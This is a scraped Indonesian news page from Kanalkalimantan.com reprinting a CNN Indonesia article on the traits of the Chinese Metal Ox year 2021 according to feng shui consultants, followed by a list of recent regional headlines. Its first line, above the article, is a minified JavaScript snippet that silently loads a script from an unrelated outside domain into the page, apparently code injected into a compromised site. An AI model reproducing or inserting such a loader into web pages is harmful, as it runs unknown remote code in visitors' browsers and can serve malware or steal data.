(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Simak Peruntungan dan Karakter di Tahun Kerbau Logam 2021


KANALKALIMANTAN.COM, BANJARMASIN – Selamat tahun baru China 2572 atau Imlek 2021. Dalam ilmu perbintangan China, tahun ini merupakan tahun Kerbau Logam. Berikut karakteristik tahun Kerbau Logam 2021.
Setiap orang yang lahir pada tahun ini akan memiliki Shio Kerbau. Sama dengan orang yang lahir pada tahun 2009, 1997, 1985, 1973, dan 1961.

Pakar Feng Shui Yulius Fang dan Angelina Fang menjelaskan, tahun Kerbau Logam memiliki karakteristik tersendiri yang dipengaruhi oleh sejumlah elemen. Yulius menyebut, karakteristik ini memengaruhi kondisi atau cara berpikir seseorang pada tahun ini, begitu pula dengan orang yang lahir di tahun ini.

“Tahun Kerbau bukan berarti memiliki sifat binatangnya,” kata Yulius kepada CNNIndonesia.com, beberapa waktu lalu jelang Imlek 2021.

Yulius menyebut, tahun Kerbau memiliki unsur logam kecil yang diibaratkan seperti intan dan juga jarum suntik. Unsur ini memiliki sifat positif dan juga negatif.
Seperti intan yang banyak dijadikan perhiasan, sifat dominannya adalah cantik dan indah dipandang.

 

“Estetika yang cantik itu banyak muncul di tahun ini, misalnya tren rumah yang indah,” ujar Yulius. Selain itu, logam juga punya daya juang yang tinggi dan tegas.

Namun, di balik itu, logam punya sifat negatif, yakni ceroboh dan tajam sehingga mudah melukai.

“Kadang muncul sifat yang brutal, yang melukai, berbahaya, dan mematikan layaknya pisau,” ucap Yulius yang merupakan pendiri Feng Shui Consulting Indonesia.

Selain logam, tahun Kerbau ini juga memiliki elemen tanah kecil yang basah. Elemen ini juga punya sifat yang positif dan negatif.
Tanah yang basah punya karakteristik yang sabar, fleksibel, baik hati, dan bertanggung jawab. Sedangkan kekurangannya, cenderung lambat, berpikiran sempit, curiga, dan oportunis.(Kanalkalimantan.com/cnnindonesia)

Reporter: cnnindonesia
Editor: cell


Al Ghifari

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

4 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

4 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

5 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

9 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

11 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

11 jam ago

This website uses cookies.